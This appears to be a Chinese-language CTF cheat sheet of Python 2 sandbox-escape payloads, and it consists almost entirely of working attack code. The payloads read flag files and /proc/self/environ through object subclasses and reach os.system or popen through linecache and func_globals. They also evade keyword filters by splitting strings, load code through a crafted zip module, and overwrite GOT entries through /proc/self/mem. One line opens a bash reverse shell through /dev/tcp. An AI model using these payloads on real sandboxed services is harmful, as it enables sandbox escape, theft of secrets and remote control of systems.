读取文件
print [].__class__.__base__.__subclasses__()[40]('/home/ctf/flag').read()
在 linecache 中寻找 os 模块执行系统命令
print [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].__dict__.values()[144]('id')
在自模块中寻找 os 模块执行系统命令
{}.__class__.__bases__[0].__subclasses__()[71].__getattribute__({}.__class__.__bases__[0].__subclasses__()[71].__init__.__func__,'func'+'_global' +'s')['o'+'s'].popen('bash -c "bash -i >& /dev/tcp/xxx/xxx 0<&1 2>&1"')
读取重要信息
print [].__class__.__base__.__subclasses__()[40]('/proc/self/environ').read()
print [].__class__.__base__.__subclasses__()[40]('/proc/self/exe').read()
print [].__class__.__base__.__subclasses__()[40]('/proc/self/maps').read()
print [].__class__.__base__.__subclasses__()[40]('/proc/self/cmdline').read()
构造 zip module 使用 zipimporter
code = 'PK\x03\x04\x14\x00\x02\x00\x08\x00\xeca\x9dL\x15\xa5\x99\x18;\x00\x00\x00>\x00\x00\x00\x08\x00\x1c\x00lilac.pyUT\t\x00\x03\xdcF\xe5Z\xdcF\xe5Zux\x0b\x00\x01\x04\xf4\x01\x00\x00\x04\xf4\x01\x00\x00SV\xd0\xd5\xd2UH\xceO\xc9\xccK\xb7R(-I\xd3\xb5\x00\x89pqe\xe6\x16\xe4\x17\x95(\xe4\x17sq\x15\x14e\xe6\x81Xz\xc5\x95\xc5%\xa9\xb9\x1a\xea9\xc5\n\xba\x899\xea\x9a\\\x00PK\x01\x02\x1e\x03\x14\x00\x02\x00\x08\x00\xeca\x9dL\x15\xa5\x99\x18;\x00\x00\x00>\x00\x00\x00\x08\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xb4\x81\x00\x00\x00\x00lilac.pyUT\x05\x00\x03\xdcF\xe5Zux\x0b\x00\x01\x04\xf4\x01\x00\x00\x04\xf4\x01\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00N\x00\x00\x00}\x00\x00\x00\x00\x00'
print [].__class__.__base__.__subclasses__()[40]('/tmp/lilac', 'a+').write(code)
print [].__class__.__base__.__subclasses__()[40]('/tmp/lilac').read()
[].__class__.__base__.__subclasses__()[55]('/tmp/lilac').load_module('lilac')
print [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'sgninraw_hctac'[::-1]][0]()._module.__builtins__
替换 open 与 system 的 GOT 表
print [].__class__.__base__.__subclasses__()[40]('/proc/self/exe').read()
readelf -a | grep system
readelf -a | grep open
00000000008de2b8 R_X86_64_JUMP_SLOT system@GLIBC_2.2.5
00000000008de8c8 R_X86_64_JUMP_SLOT fopen64@GLIBC_2.2.5
(lambda r, w:r.seek(0x8de2b8) or w.seek(0x8de8c8) or w.write(r.read(8)) or [].__class__.__base__.__subclasses__()[40]('/bin/sh')) ([].__class__.__base__.__subclasses__()[40]('/proc/self/mem','r'),[].__class__.__base__.__subclasses__()[40]('/proc/self/mem','w',0))
(lambda fc=(lambda n: [c for c in ().class.bases[0].subclasses() if c.name == n][0]): fc("function")(fc("code")(0,0,1,64,"d\x00\x00GHd\x01\x00S",('a', None),(),(),"","",0,""),{})())()
另两种
所以__getattribute__('global'+'s')即可
x = [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'ca'+'tch_warnings'][0].__init__
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('l'+'s')
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('l'+'s /home/ctf')
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb')
print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('__global'+'s__')['__builtins__']['e'+'v'+'a'+'l']("__import__('o'+'s').__dict__['sy'+'stem']('whoami')")
参考文章:
- https://blog.csdn.net/qq_35078631/article/details/78504415
- https://blog.mheistermann.de/2014/04/14/plaidctf-2014-nightmares-pwnables-375-writeup/
- Jessica McKellar: Building and breaking a Python sandbox - PyCon 2014